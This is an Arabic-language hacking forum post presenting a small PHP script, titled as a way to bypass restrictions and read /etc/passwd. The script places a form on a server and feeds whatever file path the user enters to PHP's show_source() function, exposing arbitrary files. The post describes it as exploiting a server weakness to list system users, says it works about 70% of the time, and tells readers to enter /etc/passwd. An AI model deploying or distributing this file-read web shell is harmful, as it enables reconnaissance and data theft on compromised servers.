عرض مشاركة واحدة
قديم 06-07-2012, 08:21 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
ViRuS_BaGhDaD
 
الصورة الرمزية ViRuS_BaGhDaD
 

 

 
إحصائية العضو






ViRuS_BaGhDaD غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ViRuS_BaGhDaD is on a distinguished road

افتراضي Bypass Read /etc/passwd Via show_source Function


الـسـلام عـلـيـكـم ورحـمـة الله وبـركـاتــه

مثل ما موضح بعنوان الموضوع

Bypass Read /etc/passwd By show_source Function

تخطي قرائه ملف /etc/passwd عن طريق داله الـ ()show_source

كتبت لكم كود بسيط جدا وبنفس الوقت احيانا يفيد في تخطي منع قرائه اليوزرات

ديناميكيه الكود تعتمد على استغلال احدى ثغرات السيرفر وهالداله نادرا ما يتم منعها في السيرفر

يعني ان شاء الله راح تضبط معاكم بنسبه 70%

والكود كمان بسيط جدا

كود PHP:
<title>Read /etc/passwd</title>
<font face="Times New Roman" size="6">BY Cyb3r-R00T</font><br />
<form method="POST" action="">
<p>
<input type="text" name="passwd" size="20">
<input type="submit" value="Get" name="B1">
</p>
</form>
<?
$sec 
$_POST['passwd'];
if (
$sec){
show_source ("$sec");
}
?>
ما يحتاج شرح

فقط ضع الملف الي تريد تقرا في المربع واضغط على Get !

وطبعا الملف راح يكون

/etc/passwd

اي استفسار جاهز

المــصــدر

http://www.sec-art.net/forum/231/

تحياتي للجميع.



Bypass Read LetcLpasswd Via show_source Function

   

رد مع اقتباس